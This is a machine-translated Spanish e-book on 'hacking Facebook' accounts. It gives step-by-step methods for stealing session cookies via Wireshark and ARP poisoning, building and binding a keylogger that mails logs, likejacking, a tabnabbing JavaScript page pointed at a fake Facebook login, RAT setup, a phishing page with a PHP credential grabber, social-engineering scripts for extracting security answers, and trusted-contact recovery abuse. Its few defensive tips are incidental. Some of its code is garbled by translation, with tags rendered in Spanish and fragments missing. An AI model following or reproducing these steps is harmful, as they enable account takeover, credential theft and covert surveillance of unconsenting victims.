Facebook Hacking - En.es
Facebook Hacking - En.es
com
1
2
Nota legal
Derechos de autorwww.cyber-worldd.blogspot.in
3
Sobre el Autor
Únete a su blog:
Experto en computacion
Únete a él en FB:
anurag dwivedi
Derechos de autorwww.cyber-worldd.blogspot.in
4
RECONOCIMIENTO
“Para cualquier trabajo exitoso, se debe agradecer a muchos”
Nadie camina solo y cuando uno está caminando en el viaje de la vida, comienza a
agradecer a aquellos que lo acompañaron, caminaron a su lado y lo ayudaron en el
camino.
A lo largo de los años, aquellos con los que me he encontrado y trabajado me han instado
continuamente a escribir un libro, compartir mis conocimientos y habilidades en papel y compartir
mis ideas junto con los secretos de mi enfoque continuo y positivo de la vida y toda esa vida. nos
lanza. Así que por fin, aquí está.
Entonces, tal vez este libro y sus páginas serán vistos como "gracias" a las decenas de miles
de ustedes que me han ayudado a hacer de mi vida lo que es hoy. El trabajo duro, el
conocimiento, la dedicación y la actitud positiva son necesarios para realizar cualquier tarea
con éxito, pero un ingrediente que también es muy importante es la cooperación.
Todas las palabras son un léxico inútil y sin sentido si no expreso mi sentido de respeto
por mis padres y mi hermana por sus sacrificios, bendiciones, oraciones, amor eterno,
dolor y fe en mí.
Expreso mi más sincero reconocimiento a mis padres, el Sr. Surendra Dwivedi y la Sra.
Manju Dwivedi. También agradezco a mi hermano Abhishek Dwivedi y a todos los
miembros de mi familia por su apoyo invaluable. finalmente a mis amigosdeepika
shukla, Shrey Trivedi,tanque de jigar,aakash kumarYUjjwal Gautama (Gillu)sin ustedes
amigos nunca llegaría a este puesto gracias amigo.
Para terminar, también te agradezco que estés leyendo este libro.
Derechos de autorwww.cyber-worldd.blogspot.in
5
Tabla de contenido
5. Robo de clics
6. Tomando pestañas
Derechos de autorwww.cyber-worldd.blogspot.in
6
B. Consejos/trucos de Facebook
Derechos de autorwww.cyber-worldd.blogspot.in
7
Derechos de autorwww.cyber-worldd.blogspot.in
8
Derechos de autorwww.cyber-worldd.blogspot.in
9
mediante la obtención subrepticia de la ID de sesión y haciéndose pasar por el usuario autorizado. Una vez que se ha accedido a la
identificación de la sesión del usuario (a través de la predicción de la sesión), el atacante puede hacerse pasar por ese usuario y hacer
La ID de sesión normalmente se almacena dentro de una cookie o URL. Para la mayoría de las comunicaciones, los
procedimientos de autenticación se llevan a cabo en la configuración. El secuestro de sesiones se aprovecha de esa práctica
al entrometerse en tiempo real, durante una sesión. La intrusión puede o no ser detectable, según el nivel de conocimientos
técnicos del usuario y la naturaleza del ataque. Si un sitio web no responde de la manera normal o esperada a la entrada del
usuario o deja de responder por un motivo desconocido, el secuestro de sesión es una posible causa.
capturar paquetes transferidos a través de esta red. Tenga en cuenta que su adaptador inalámbrico debe admitir el modo de
monitor para escanear todos los paquetes transferidos a través de una red. puede verificar las especificaciones de su tarjeta wi-fi
Entonces necesitaríamos usar una herramienta de rastreo de red para rastrear los paquetes transferidos a través de la red.
En este caso, estoy usando una herramienta llamada Wireshark (Descargar desde aquí ). Dentro de wireshark, hay un menú
llamado "Capturar"; En el menú de captura, seleccione las interfaces de ese menú y aparecerá una lista de sus interfaces..
Derechos de autorwww.cyber-worldd.blogspot.in
10
A continuación, seleccione Iniciar junto a la interfaz en la que ha habilitado el modo de monitor. la mayoría de las
veces es la interfaz la que captura la mayoría de los paquetes. En mi caso, la interfaz de Microsoft captura la mayoría
de los paquetes, por lo que seleccionaré comenzar a capturar con la interfaz de Microsoft. Dejaría que Wireshark
capturara paquetes durante un par de segundos, dependiendo de la cantidad de personas que actualmente usan la
red. Digamos 30 segundos si 10 personas están usando la red actualmente, o 30 minutos si apenas hay actividad en
la red. Durante la captura, Wireshark se verá así.
Después de capturar una cierta cantidad de paquetes, o ejecutar la captura durante un cierto período de tiempo, deténgala
haciendo clic en el botón detener la captura actual.
Después de detener la captura, deberá buscar la cookie de sesión de Facebook del usuario que, con suerte, se transfirió
en uno de los paquetes capturados. para encontrar esta cookie, use la búsqueda de wireshark que se puede encontrar
presionando "ctrl + f" en su teclado. En esta interfaz de búsqueda, seleccione Buscar: Por "Cadena"; Buscar en: "Detalles
del paquete". y filtrar por la cadena "Cookie".
Derechos de autorwww.cyber-worldd.blogspot.in
11
Cuando presiona buscar, si hay una cookie, esta búsqueda la encontrará, si no se capturó ninguna cookie, tendrá
que volver al paso 2. Sin embargo, si tiene suerte y capturamos algunas cookies, cuando busque cookie, su interfaz
se verá así en el diagrama a continuación. Notará que la cookie junto a la flecha contiene muchos datos, para
obtener los datos. lo siguiente que debe hacer es hacer clic con el botón derecho en la cookie y hacer clic en copiar-
> descripción.
Después de copiar la descripción, péguela en un archivo de texto y separe cada variable en una nueva línea (tenga en cuenta
que el final de cada variable se representa con un punto y coma, por ejemplo, c_user=100002316516702;). Después de
investigar y experimentar un poco, descubrí que Facebook autenticó la sesión del usuario mediante 2 cookies llamadas
c_user y xs. Por lo tanto, solo necesitará los valores de estas cookies y luego deberá inyectarlas en su navegador. Antes de
inyectar las cookies, así es como se veía mi página de Facebook:
Derechos de autorwww.cyber-worldd.blogspot.in
12
Lo siguiente que debe hacer es inyectar esta información como su propia cookie. así que primero necesitaría instalar una
extensión de administrador de cookies para su navegador, estoy usando el Administrador de cookies de Firefox. Después de
instalar esta extensión, la encontrará en Herramientas->administrador de cookies. La interfaz para el administrador de cookies se
ve así:
Lo primero que tendríamos que hacer es borrar todas las cookies, así que borre todas las cookies que tiene actualmente.
Luego seleccione el enlace "Agregar cookie" para agregar una nueva cookie. La primera cookie que agregará es la cookie
c_user que tendrá la siguiente información: Dominio: ".facebook.com", nombre: "c_user", valor: "el valor que copió
anteriormente del escaneo de wireshark" y la ruta: "/"; deje los valores predeterminados de isSecure y Expires On:
Derechos de autorwww.cyber-worldd.blogspot.in
13
Lo siguiente que debe hacer es presionar el botón "Agregar" y la cookie se guarda. Repita los mismos pasos para
agregar la cookie xs con toda la misma información, excepto el valor, que sería el valor xs que tiene.
Después de agregar estas 2 cookies, simplemente vaya a facebook.com, actualice la página y... ¡¡Boom!! verá que ha
iniciado sesión como ese usuario cuya información de cookies robó. Aquí está mi página de Facebook después de que
inyecté esas cookies:
Derechos de autorwww.cyber-worldd.blogspot.in
14
De hecho, tendrá que deshabilitar temporalmente esta función cada vez que dé acceso a una nueva
aplicación. Eso solo debería darle la confianza de que ha logrado un mayor nivel de protección.
Si bien no tengo una base técnica para esto, es lógico que los piratas informáticos ingresen a través del servicio de chat.
Cada vez que he notado comentarios falsos supuestamente hechos por mí a mis amigos de Facebook, es porque
anteriormente había usado el chat en línea.
Para deshabilitar el chat, simplemente haga clic en la pequeña rueda en la barra lateral derecha y desconéctese. Luego cierre la ventana y
Derechos de autorwww.cyber-worldd.blogspot.in
15
Cuando otorga acceso a las aplicaciones de Facebook, esos permisos duran mucho después de que deja de usarlos. Ir a este enlace
pararevisa los permisos de tu aplicación de Facebook –y deshabilite cualquiera que ya no esté usando.
Facebook le permite recibir notificaciones de texto cada vez que se accede a su cuenta desde un dispositivo
que no sea su computadora principal o dispositivo móvil.
Simplemente vaya a Configuración de la cuenta y luego a Configuración de seguridad para configurar las notificaciones adecuadas para
su dispositivo móvil.
Derechos de autorwww.cyber-worldd.blogspot.in
dieciséis
Solo puede elegir notificaciones por correo electrónico o mensajes de texto. Al elegir las notificaciones de texto, no solo
recibe un aviso inmediato, sino que también activa tanto su dispositivo móvil como su computadora principal como puntos
de acceso aprobados.
La dirección de correo electrónico que usa para Facebook debe ser distinta de la que usa donde la seguridad es más
crítica, como su cuenta bancaria en línea o Paypal.
Si su cuenta de Facebook es pirateada, es vergonzoso. Si ese es el mismo correo electrónico utilizado en sus cuentas
más seguras, ahora esa vulnerabilidad podría ser costosa.
Obviamente, si es selectivo con sus direcciones de correo electrónico y cambia periódicamente sus contraseñas, minimiza
sus posibilidades de ser pirateado.
¿Sabías que cualquiera puede buscar en Facebook una dirección de correo electrónico? Por ejemplo, si está buscando un
nombre común como John Smith, solo necesita buscar con su correo electrónico para encontrar el correcto.
Esto es útil para encontrar a tus amigos en Facebook, pero también es útil para los piratas informáticos. La apuesta segura es usar
Hay aún más formas de proteger su Facebook y otras cuentas en línea, pero estas 5 son
las más esenciales y son específicas de Facebook, que parece ser el sitio más vulnerable.
Derechos de autorwww.cyber-worldd.blogspot.in
17
El servidor web utiliza las cookies almacenadas para identificar y autenticar al usuario. Por ejemplo, cuando un usuario inicia
sesión en Facebook, se genera una cadena única y una copia de la misma se guarda en el servidor y otra se guarda en el
navegador del usuario como cookies. Ambos coinciden cada vez que el usuario hace algo en su cuenta.
Entonces, si robamos la cookie de la víctima y la inyectamos en nuestro navegador, podremos imitar la identidad de la víctima en
el servidor web y, por lo tanto, podremos iniciar sesión en su cuenta. Esto se llama elevación lateral. Lo mejor de esto es que no
necesitamos la identificación o la contraseña de las víctimas, todo lo que necesitamos es la cookie de las víctimas..
1. Primero ARP envenena a la víctima. Para esto, puede consultar mis artículos anteriores sobre cómo ARP envenena la
2. Después del envenenamiento por ARP, abra Wire Shark, haga clic en el botón de captura de la barra de menú, luego seleccione la interfaz
. Ahora seleccione su interfaz (generalmente eth0) y finalmente haga clic en Iniciar captura.
3. Ahora puede ver los paquetes que se capturan, espere un momento hasta que la víctima inicie sesión en su
cuenta (Facebook/twitter),
4. Mientras busca la dirección IP de Facebook, para esto puede abrir CMD (símbolo del sistema) e ingresar .Ping
Facebook.com para encontrar su dirección IP.
5. Ahora filtre los paquetes ingresando la dirección IP (Facebook) en la barra de filtro y haga clic en aplicar
6.ahora localizaHTTP Obtener /home.phpy copie todos los nombres y valores de las cookies en un bloc de notas.
7.Ahora abre Firefox y abreañadir y editar cookies,que descargamos anteriormente, agregue todos los valores de las
cookies y guárdelos.
Derechos de autorwww.cyber-worldd.blogspot.in
18
8.Ahora abra Facebook en una nueva pestaña, iniciará sesión en la cuenta de la víctima.
chris defaulter san valentin ...... ha pirateado la cuenta de Facebook de la víctima mediante el robo de cookies, también puede
seguir los mismos pasos para piratear cuentas de Twitter
Derechos de autorwww.cyber-worldd.blogspot.in
19
pasando en su computadora en su ausencia: qué se ejecutó y escribió, etc., que actúan como el mejor software de protección de
Internet para niños. Usando el programa de registro de teclas constantemente, puede restaurar el texto escrito anteriormente en
caso de que lo haya perdido. El software registrador de pulsaciones de teclas funciona en modo oculto e invisible en el sistema
2) Solo doy información sobre Neptune 1.4, pero también puedes usar 1.45, es una versión actualizadai en eso también se envía una
captura de pantalla.
Después de la descarga, extraiga el archivo .rar, abra la carpeta del proyecto, haga clic en el proyecto Neptune v1.4. Ahora aparecerá una
ventana como la que se muestra a continuación. Haga lo que se menciona en la captura de pantalla.
Nota: estoy dando tut para obtener registros por correo (gmail aquí), pero también puede usar otro, o también puede usar el servidor
ftp.
Derechos de autorwww.cyber-worldd.blogspot.in
20
3) Ahora vaya a la pestaña 'Creación de servidor' y presione 'Generar nuevo servidor' en 'creación de servidor', dé el
nombre de su registrador de teclas y eso es todo... ya está :)
4) Hágalo autodestructivo: en la pestaña Opciones adicionales, puede marcar 'autodestrucción en', si desea
que se elimine después de una fecha en particular.
5) Agregar ícono: también puede agregar cualquier ícono al archivo final del registrador de teclas, para eso, vaya a la pestaña
'Creación del servidor' y seleccione 'Usar archivoi con' en 'configuración del servidor' y seleccione cualquier archivo de icono.
6) Vinculación: también puede vincularlo con cualquier otro archivo, para eso presione el botón del archivador, se abrirá una
ventana (como se muestra en la captura de pantalla), luego haga clic con el botón derecho y seleccione 'agregar archivo' y luego
seleccione cualquier cosa, por ej. cualquier software, película, video, canción, etc. con el que quieras vincularlo. 5.1) Después de
7) Capturas de pantalla: (solo avai lable en naptune 1.45) Vaya a Opciones adicionales, marque 'enviar capturas de pantalla' en
'Capturas de pantalla'
Derechos de autorwww.cyber-worldd.blogspot.in
21
Sección 5 – Clickjacking:-
Hay varios tipos de secuestro de clics, pero el más común es ocultar un botón ME GUSTA debajo de un botón ficticio o falso.
Esta técnica se llama Likejacking. Un estafador o un pirata informático puede engañarlo diciendo que le gusta un producto
que nunca ha escuchado. A primera vista, likejacking suena más molesto que dañino, pero eso no siempre es cierto. Si te
estafan por gustarte Mark Zukenberg, es poco probable que el mundo se acabe. Pero es posible que esté ayudando a
propagar spam o posiblemente enviando amigos a algún lugar que contenga malware.
Derechos de autorwww.cyber-worldd.blogspot.in
22
HCómo funciona?
El botón Me gusta se oculta y se mueve junto con el mouse. Entonces, donde sea que el usuario haga clic, se hace clic en el botón
Me gusta y le gusta su página de fans. Primero descargue el JavaScript desde el enlace de descarga a continuación.
mediafuego
Después de descargar el script, extraiga todos los archivos. Ahora modifique config.js y siga las instrucciones a
continuación.
1. Modifique el archivo config.js en la carpeta "src" para cambiar la URL de la página de fans y otras cosas. Los
comentarios se proporcionan junto a ellos para ayudarlo a saber qué hacen exactamente.
2. Hay una función de tiempo de espera después de la cual el botón Me gusta ya no estará presente (mover). "tiempo" si se
establece en 0 hará que permanezca para siempre (lo que generalmente no se prefiere).
3. Establezca la opacidad en '0' antes de ejecutar el script. De lo contrario, el botón Me gusta no será invisible.
----------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------
Derechos de autorwww.cyber-worldd.blogspot.in
23
Sección 6 – Tabnapping:-
Hola amigos, soy Chris Defaulter Valentine. Ingeniero de sistemas certificado por Microsoft
(MCSE), pirata informático IIT de comercializador de Internet Tengo 10 años de experiencia eludiendo
Medidas de seguridad de la información y puedo informar que comprometí todo con éxito
Sistemas a los que me dirigí para acceso no autorizado, excepto uno. tengo dos años'
1. Un hacker dice (yo Chris) personaliza la página web actual editando/agregando algunos nuevos
2.Envío una copia de esta página web a la víctima cuya cuenta o lo que sea que quiero hackear.
3.Ahora, cuando el usuario abra ese enlace, se abrirá una página web similar a esta en iframe
Derechos de autorwww.cyber-worldd.blogspot.in
24
4.El usuario podrá navegar por el sitio web como el original, como avanzar
hacia atrás y navegar por las páginas.
5.Ahora, si la víctima dejó abierta la nueva página web durante un cierto período de tiempo, la pestaña o el
sitio web cambiará a Phish Page o simplemente se llamará página falsa que se verá absolutamente similar a
la original.
6.Ahora, cuando el usuario ingresa sus credenciales (nombre de usuario/contraseña), ingresa eso en la
página falsa y queda atrapado en nuestra red que he establecido para piratearlo.
Antes de codificar Part, primero compartamos consejos para protegerse de este tipo de
ataque porque es completamente indetectable y nunca podrá saber que su cuenta fue
pirateada o comprometida. Entonces, primero aprenda cómo protegerse de Advanced
Tabnabbing.
1.Utilice siempre complementos de secuencias de comandos anti-java en su navegador web que detengan la
ejecución de javascripts maliciosos. Por ejemplo: Noscript para Firefox, etc.
2.Si nota que suceden cosas sospechosas, primero verifique la URL en la barra de
direcciones.
3.Si recibe algún enlace en el correo electrónico o mensaje de chat, nunca haga clic directamente en él. Siempre
prefiere escribirlo manualmente en la barra de direcciones para abrirlo, esto puede costarle algo de manual
4.La mejor manera es usar cualquier buena barra de herramientas de seguridad web como la barra de herramientas web AVG o Norton
5.Si usa ideveloper o Firebug, verifique los encabezados usted mismo si encuentra
algo sospechoso
Derechos de autorwww.cyber-worldd.blogspot.in
25
Eso termina nuestra parte de seguridad. Aquí termina mi deber ético de hacker de notificar a todos los usuarios sobre
Nota:Aza Raskin fue la primera persona en proponer la técnica del tabnabbing y todavía
<!--
Título: Tabnabbing avanzado usando IFRAMES y Java script
Autor: Chris Defaulter Valentine (Anónimo)
-->
<html>
<título><título></título></título>
<tipo de estilo="texto/css">
html {desbordamiento: automático;}
Derechos de autorwww.cyber-worldd.blogspot.in
26
<script tipo="texto/javascript">
//---------Establecer opciones de secuencia de comandos--------------
//EncontrarTipo de navegador
}
//Establecer REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Establecer FAVICON
si(REAL_FAVICON){
var enlace = documento.createElement('enlace');
link.type = 'imagen/icono-x';
link.rel = 'icono de acceso directo';
enlace.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(enlace);
}
el_tabnab.onblur = función(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= función(){
if(TEMPORIZADOR) clearTimeout(TEMPORIZADOR);
}
} más {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
función TabNabIt(){
si (CONMUTADO == "falso"){
//Redirige el iframe a FAKE_PAGE_URL
el_tabnab.src=URL_PÁGINA_FALSA;
//Cambiar título a FAKE_PAGE_TITLE y favicon a
FAKE_PAGE_FAVICON
if(FALSO_PÁGINA_TÍTULO) documento.título = FALSO_PÁGINA_TÍTULO;
document.getElementsByTagName("head")[0].removeChild(bucleenlace);
}
}
var enlace = documento.createElement("enlace");
link.type = "imagen/icono-x";
link.rel = "icono de acceso directo";
enlace.href = FALSO_FAVICON;
document.getElementsByTagName("head")[0].appendChild(enlace);
}
}
}
</script>
</cuerpo>
</html>
Ahora, lo que necesita reemplazar en este código para que funcione, diga para Facebook:
1.REAL_PAGE_URL: www.facebook.com
2.REAL_PAGE_TITLE:Bienvenido a Facebook -Inicie sesión, regístrese o aprenda más
3.FAKE_PAGE_URL: URL de su página falsa o página de suplantación de identidad
4.FAKE_PAGE_TITLE: Bienvenido a Facebook: inicie sesión, regístrese u obtenga más información
5.REAL_FAVICON: www.facebook.com/favicon.ico
6.FAKE_FAVICON: URL de su página falsa/favicon.ico (Nota:Es mejor subir el favicon
de facebook, lo hará más indetectable)
7.BROWSER_TYPE: encuentre qué navegador web usa normalmente el usuario y ponga ese nombre aquí
entre comillas.
8.TIME_TO_SWITCH_IE: coloque el valor numérico (tiempo) después de que desee cambiar de pestaña.
9.TIME_TO_SWITCH_OTHERS: tiempo después del cual desea volver a la página 'real'
original o alguna otra página.
Derechos de autorwww.cyber-worldd.blogspot.in
30
Ahora, como expliqué anteriormente, puede usar esta técnica para piratear cualquier cosa, como cuentas de
correo electrónico, Facebook o cualquier otrositio web de redes sociales.Lo que debe hacer es editar los 9
campos mencionados anteriormente, guardarlos como anyname.htm y cargarlos de forma gratuita.sitio web
de alojamiento webjunto con el archivo favicon y envíe el enlace al usuario en forma de correo electrónico o
mensaje de chat (oculto usando la palabra clave href en html o falsificado usando alguna otra técnica).
Derechos de autorwww.cyber-worldd.blogspot.in
31
Una herramienta de administración remota (o RAT) es un programa que permite a ciertas personas conectarse y
administrar computadoras remotas en Internet o en una red local. Una herramienta de administración remota se
basa en la tecnología de servidor y cliente. La parte del servidor se ejecuta en una computadora controlada y recibe
comandos del cliente, que está instalado en otro host remoto. Una herramienta de administración remota funciona
en segundo plano y se oculta del usuario. La persona que lo controla puede monitorear la actividad del usuario,
administrar archivos, instalar software adicional, controlar todo el sistema, incluida cualquier aplicación presente o
dispositivo de hardware, modificar la configuración esencial del sistema, apagar o reiniciar una computadora.
Ahora debe instalar No-DUP 3.0, haga clic en "Siguiente". Ahora, elija
Derechos de autorwww.cyber-worldd.blogspot.in
32
ahora siguehttp://www.no-ip.com/ y haga clic en "Iniciar sesión", luego escriba su correo electrónico y su contraseña. Ahora, haga
Listo, ahora abra No-IP DUC 3.0 e ingrese su correo electrónico y su contraseña y haga clic en "Aceptar".
Haga clic en [+], elija su puerto (sugiero 1604) y haga clic en "Escuchar". Ahora haga
clic en "Configuración".
Ahora editará su servidor, haga clic en "Editar servidor" y haga clic en "Configuración de la red",ingrese su
resultados
Derechos de autorwww.cyber-worldd.blogspot.in
33
Yo mismo he tenido algunas personas en el pasado que me han hecho preguntas sobre ingeniería social. Siempre le digo a
cualquiera que se imagine la ingeniería social como un juego. Pero antes de hablar sobre el 'Juego', quiero entrar en detalles sobre
sugeriría que tenga un esquema claro de lo que está tratando de lograr, ya sea obtener la contraseña de correo electrónico de alguien,
explotarlos por dinero, ingresar a un grupo/clan de juego en línea, etc., etc. En este caso, el correo electrónico y la contraseña deCuenta de
Facebook.
En primer lugar, debe tener en cuenta lo que necesitará, para este tutorial de ingeniería social voy a resumir
esto desde la perspectiva de obtener la contraseña de correo electrónico de alguien. Antes de continuar, me
gustaría enfatizar algunos factores importantes que quizás desee tener en cuenta:
Voy a desglosar estos tres puntos para darle una mejor comprensión de por qué esto es:
Derechos de autorwww.cyber-worldd.blogspot.in
34
En el caso de 1 -casi todo el mundo parece ser más descuidado cuando te perciben como un idiota, la principal
razón es que no consideras a alguien que parece ser un idiota como una amenaza. Otra razón es que las personas
tienden a volverse más abiertas y arrogantes cuando sienten que están en un pedestal más alto que tú.(¡nunca
olvides eso!).Sin embargo, hay cosas que debes recordar, aunque estas cosas son ciertas si exageras tu
personalidad idiota, no será bueno para tu fortuna. Recuerda siempre que los verdaderos imbéciles son molestos
como el infierno, túNO HAGAquiere desanimar a la persona que está tratando de hacer ingeniería social (a menos
que esté tratando de fallar, luego noquearse).
En el caso de 2 -cuando se habla con alguien, es fácil ver por qué se recomienda esta regla. A menudo es un buen rompehielos,
que también refuerza la idea de que"eres un buen chico", lentamente le permite a la persona construir una relación de 'confianza'
contigo.
en el caso de 3 -También es un consejo obvio, si solo molestas a alguien para obtener información sin al menos
pretender interesarte en lo que está diciendo, no solo parecerás grosero, sino que hará que la persona se pregunte
por qué los estás investigando para obtener información personal.
Con estos tres puntos establecidos, ahora continuaré con mi ejemplo de cómo obtener el correo electrónico y la contraseña de
Facebook de alguien. Antes de entrar en detalles, es importante resumir lo que necesita para obtener con éxito la contraseña de
alguien mediante ingeniería social. Ahora podría intentar aplicarles ingeniería social para obtener su contraseña. Le aconsejo que
sea un poco más inteligente e indirectamente haga ingeniería social para obtener su contraseña al obtener su conocimiento de
recuperación de contraseña. Ahora es importante lo que necesita para hackear con éxito su cuenta a través de preguntas de
recuperación. Necesitarás lo siguiente:
La contraseña de su cuenta
Con esto en mente, es imperativo que planee cómo obtendrá estos detalles. Te diré cómo lo hago. Pero
primero necesito que comprenda que toda esta transacción no se completará en el transcurso de un día,
puede demorar días o semanas según la persona. Te sugiero que hables con ellos y los leas primero. Si están
abiertos, puede hacerlo en cuestión de días; si no, sería mejor que lo extendiera en una o dos semanas.
También quiero que imagine lo que dirá, intente predecir sus respuestas y, SOBRE TODO, piense en un chivo expiatorio
sobre por qué los está investigando para obtener estas respuestas, en caso de que sea menos sutil y despierte sospechas, si
es que alguna vez sospechan de usted. pasará de una llama a un incendio, es importante sellar todas sus dudas en ti lo antes
posible.
Ahora hay muchas formas de obtener su contraseña y destinatario. Algunas personas y publican su dirección
en sus perfiles. En cuyo caso, se trata de presas fáciles, sin embargo, eso es raro. Por lo tanto, debe idear una
forma de obtener esa información. Ahora puede fingir que es del banco o algo así y pedir su dirección de
correo electrónico. O puedes fingir que eres un estudiante y estás investigando. Ser creativo
Derechos de autorwww.cyber-worldd.blogspot.in
35
Ahora necesito la respuesta a su pregunta de seguridad, ahora necesita averiguar cuál es la pregunta, le sugiero que finja
recuperar la contraseña para ver cuál es u obtener la información de todas las preguntas de recuperación que solicita el correo
electrónico. Voy a ir con la primera opción y decir, por ejemplo, que su pregunta de recuperación fue: ¿Cuál es el nombre de su
perro?
Cómo haría para obtener esto sería pretender tener una mascota propia, comenzaría la
conversación así:
yo:Ffs mi perro no deja de ladrar, en serio, ¿dónde dejé mi cinta adhesiva jajaja!
víctima:lol sí sé que a veces mi perro es el mismo, molesto -.-
yo:Ah tienes un perro? No me di cuenta de cuál es el nombre de tu perro, si no te importa que pregunte.
Es importante agregar"si no te importa que pregunte", porque le da a la persona un poco de poder sobre ti y también
muestra un poco de respeto (una vez más, refuerza la idea de que eres un buen tipo).
PUNTO:No me sumergiría directamente en "cuál es el nombre de su perro", comience primero con la raza y recuerde tratar
de predecir lo que preguntarán (el mío, bla, bla, ¿cuál es el suyo?).
Con eso en mente, estoy seguro de que ahora puede ver lo fácil que es diseñar la contraseña de alguien mediante ingeniería social a
través del método indirecto de recuperación de contraseña. Ahora, obviamente, la mayoría de las preguntas de recuperación no
serán sobre mascotas, en su mayoría son"apellido de soltera de la madre" "lugar de nacimiento"etc. Pero use la misma lógica y evite
esto, recuerde pensar en cada detalle y pregúntese esto si alguien le contara esta historia o le preguntara de cierta manera, ¿le
parecería legítimo?
y cuando tenga la dirección de correo electrónico, haga clic en Facebook, olvidé la contraseña y se enviará a su correo
electrónico.
El juego:
Al pensar en esto como un juego, debe reflexionar sobre sus objetivos. Como mencioné antes, trate de
imaginar el diálogo entre ambos, piense en cómo obtendrá ciertas cosas y, lo que es más importante, tenga
directivas claras. Con esto en mente, creo que ahora podemos hablar sobre cómo podrías considerar
presentarte.(sólo se aplica si la persona es de hecho un extraño).
Derechos de autorwww.cyber-worldd.blogspot.in
36
Entonces, si iba a perseguir a un completo extraño, primero debe intentar obtener la mayor cantidad de
investigación posible sobre ellos. Por ejemplo, edad, nombre. Esto es importante para compensar la identidad falsa.
¡También sugeriría que si eres ingeniero social más de una persona que escribas, en detalle! su alias no es diferente
para que no se confunda. Nada sería peor que usar el alias equivocado en la persona equivocada.
Al construir su identidad, decida qué le daría la mayor ventaja con esta persona. Esto puede ser desde fingir su edad
para que coincida con los intereses de esta persona, lo que le brinda la ventaja de poder "hacer clic" con la persona.
Pretendiendo ser un estudiante o en un trabajo sin salida por manipulación de simpatía o en el caso de un trabajo
sin salida, pretendiendo relacionarse con el esclavo. Hay muchas cosas que puedes hacer, como te he comentado
depende de las circunstancias que necesites.
Derechos de autorwww.cyber-worldd.blogspot.in
37
Suplantación de identidad-es un método de fraude por correo electrónico en el que el perpetrador envía un correo electrónico que
parece legítimo en un intento de recopilar información personal y financiera de los destinatarios. Por lo general, los mensajes
parecen provenir de sitios web conocidos y confiables. Los sitios web que los phishers falsifican con frecuencia incluyen PayPal,
eBay, MSN, Yahoo, BestBuy y America Online. Una expedición de phishing, como la expedición de pesca que le da nombre, es una
aventura especulativa: el phisher pone el señuelo con la esperanza de engañar al menos a algunas de las presas que encuentran el
cebo.
1.Primero, necesita una página de inicio de sesión falsa para Facebook (fake.html) y un script Php para redirigir y capturar las
Clave -@hackaholic
Después de descargar los archivos, abra login.php, con un bloc de notas y busque el término
www.enteryoursite.com y reemplácelo con la dirección del sitio donde desea que se redirija a la víctima,
finalmente guárdelo.
Derechos de autorwww.cyber-worldd.blogspot.in
38
Nota :Este es un paso muy importante que redirigirá a la víctima a un sitio adecuado, de lo contrario, la víctima sospechará. En
nuestro caso, estamos haciendo falsosFacebookpágina de inicio de sesión por lo que es mejor redirigir a la víctima a
www.facebook.com/careers
4.Ahora cree una cuenta en un sitio de alojamiento web gratuito como 110mb.com, T35.com o ripway.com
5.Ahora cargue ambos archivos (fake.html, login.php) en su cuenta de alojamiento y envíe el enlace fake.html (página de inicio de
6.Ahora, cuando la víctima ingrese todas sus credenciales, como el nombre de inicio de sesión y la contraseña en nuestra página de inicio
de sesión falsa y cuando haga clic en iniciar sesión, será redirigido al sitio que hicimos en el paso 3.
7.Ahora, para ver la identificación y la contraseña de las víctimas, inicie sesión en su cuenta de alojamiento "110mb.com", donde verá un nuevo archivo
Nota:-Si todavía está confundido, puede ver mi video sobre Hackear una cuenta de Facebook usando una página de inicio de sesión falsa
Derechos de autorwww.cyber-worldd.blogspot.in
39
2.Ahora proporcione el correo electrónico de la cuenta de Facebook de la víctima o proporcione el nombre de usuario de FB o el nombre del perfil y
haga clic en buscar. Y luego obtendrá la cuenta de perfil de las víctimas. Simplemente haga clic en "Esta es mi cuenta".
4.Ahora se le pedirá que ingrese una nueva dirección de correo electrónico, simplemente ingrese su nueva dirección de correo electrónico.
5.Ahora Facebook te pedirá que des la respuesta a la pregunta de seguridad. No se preocupe, simplemente ingrese la respuesta
incorrecta tres veces y será llevado a la nueva página.
6.Aquí está la parte principal de la piratería de la cuenta de Facebook. Haga clic en Continuar y FB le pedirá que seleccione 3 amigos
de confianza. Habrá una lista completa de amigos de la víctima que también incluye su"Tres cuentas de Facebook falsas".
Simplemente seleccione esas tres cuentas y luego Facebook enviará códigos de seguridad a nuestras cuentas falsas. Ahora recopile
esos códigos de seguridad e ingréselos. Entonces Facebook enviará"Correo electrónico de recuperación de contraseña"en la
dirección de correo electrónico que ingresamos en el paso 4. Por lo tanto, puede restablecer fácilmente la contraseña de la cuenta
de la víctima.
Nota :Hemos recibido los problemas como que no llegan la nueva página en
Amigos, espero que hayan disfrutado este artículo sobre Hackear cuentas de Facebook y si tienen algún problema con este
Hackeo de cuentas de Facebook gratis, por favor comenten.
Derechos de autorwww.cyber-worldd.blogspot.in
40
Concepto básico::::::::>
Así que aquí estamos... nuestra principal víctima es LAN... Pero recuerde
que si está rastreando una red de área local, asegúrese de que su tarjeta
de red esté en modo promiscuo... si no, entonces use este cmd "netsh int
UR IP set global taskoffload =deshabilitar” Ahora comencemos la parte
principal de este tema. podemos clasificar nuestro tema en tres partes
principales
2) tiburón de alambre
Derechos de autorwww.cyber-worldd.blogspot.in
41
ii) ahora encienda el sniffer haciendo clic en el botón verde donde indico con un
círculo rojo, después de iniciar Sniffer ahora presione el botón "+" para escanear
todas las direcciones MAC disponibles en nuestro
Vamos xD
Derechos de autorwww.cyber-worldd.blogspot.in
42
Derechos de autorwww.cyber-worldd.blogspot.in
43
Una vez que haya escaneado todas las direcciones MAC e IP, es hora de realizar
MitMA, para comenzar, haga clic en la pestaña ARP en la parte inferior y haga
clic en el área blanca para encender + iniciar sesión en azul.
A continuación, haga clic en el signo "+" y aparecerá una lista de hosts a los que
le gustaría olfatear los paquetes... como esta imagen...
Derechos de autorwww.cyber-worldd.blogspot.in
44
Derechos de autorwww.cyber-worldd.blogspot.in
45
Así que hasta ahora hicimos ARP Poisonig en el caché ARP de las víctimas,
ahora usaremos wireshark para rastrear los paquetes (es decir, rastrear) ahora
comenzaremos Wireshark para capturar paquetes ...
